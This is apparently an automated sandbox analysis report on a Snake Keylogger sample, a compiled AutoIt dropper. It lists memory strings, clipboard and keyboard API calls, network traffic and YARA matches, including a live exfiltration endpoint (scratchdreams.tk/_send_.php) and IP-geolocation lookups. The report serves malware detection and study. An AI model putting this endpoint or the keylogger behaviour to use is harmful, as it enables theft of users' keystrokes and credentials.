Source: name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002620000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
Source: name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49768 version: TLS 1.2

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0019EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0019EAFF

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0019ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0019ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0033ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		6_2_0033ED6A

Source: C:\Users\user\Desktop\PsBygexGwH.exe

0_2_0019EAFF

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0018AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0018AA57

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001B9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_001B9576
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00359576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		6_2_00359576

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: PsBygexGwH.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PsBygexGwH.exe, 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6544cbe5-d
Source: PsBygexGwH.exe, 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b7a97d05-4
Source: PsBygexGwH.exe, 00000000.00000003.2959475074.0000000004101000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ce91a3ca-8
Source: PsBygexGwH.exe, 00000000.00000003.2959475074.0000000004101000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c94f0853-9
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000006.00000002.2999789475.0000000000382000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1a9718ee-0
Source: name.exe, 00000006.00000002.2999789475.0000000000382000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4538d9ec-a
Source: name.exe, 00000009.00000000.3104924286.0000000000382000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4b00458a-0
Source: name.exe, 00000009.00000000.3104924286.0000000000382000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0f2108f5-4
Source: PsBygexGwH.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f24d0a11-c
Source: PsBygexGwH.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_99a18de8-d
Source: name.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_63133954-6
